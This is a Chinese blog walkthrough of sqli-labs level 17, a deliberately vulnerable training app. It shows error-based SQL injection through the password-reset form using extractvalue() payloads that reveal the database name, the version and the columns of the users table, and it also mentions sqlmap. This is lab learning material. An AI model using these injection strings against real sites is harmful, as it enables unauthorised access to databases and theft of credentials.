sqli-labs-master第17关

前言:这一关变化还是挺大的,让我们修改密码。
第17关
http://192.168.89.134/sqli-labs-master/Less-17/
在这里插入图片描述
到这里我们还是毫无头绪,只能看源代码
在这里插入图片描述
从源码中可以看到:接收到用户POST的uname和passwd后,首先根据uname查询数据库的username和password,若uname存在则用passwd替换password,若不存在则显示slap1.jpg
在用户名正确后,页面便能够返回Mysql错误信息

所以我们决定用报错注入
使用updatexml(),它和extractvaule(),这两个函数原理一样,只是updatexml()多了一个参数,我习惯用extractvaule()
我们开始吧
我们在password表单注入,所以username我们用已知的admin登录,下面就不在重复!
查看库名
admb’ or extractvalue(1,concat(0x7e,(select database())))#
在这里插入图片描述
查版本
admb’ or extractvalue(1,concat(0x7e,(select version())))#
在这里插入图片描述
接着继续获取表名
1’ and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘users’),0x7e)) #
在这里插入图片描述
获取users表的内容
在这里插入图片描述
最后我们用sqlmap跑一下会是什么结果呢?
在这里有个小问题给大家说一下,直接上图
在这里插入图片描述在这里插入图片描述
我们发现哪里有注入点就把*加在哪里!
加下来的操作一样,直接看结果
在这里插入图片描述在这里插入图片描述

总结:我们今天通过17关长了见识还可以通过密码表单注入,只是位置不一样,原理方法一样!

本文章为自己搭建实验环境做过的,参考过一些资料,希望对你有帮助

  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 7
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值